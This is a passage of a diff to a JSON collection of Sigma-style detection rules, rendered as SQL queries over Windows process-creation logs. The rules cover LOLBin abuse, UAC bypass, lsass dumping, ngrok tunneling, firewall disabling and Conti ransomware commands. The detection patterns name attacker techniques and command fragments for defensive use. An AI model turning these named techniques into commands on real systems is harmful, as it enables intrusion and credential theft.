LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process 
Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], "falsepositives": [ - "Legitimate use of the library" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": 
"cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. 
Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - 
"author": "Markus Neis, Sander Wiebing", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ 
- "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "status": "experimental", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": 
"af77cf95-c469-471c-b6a0-946c685c4798", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "PUA 
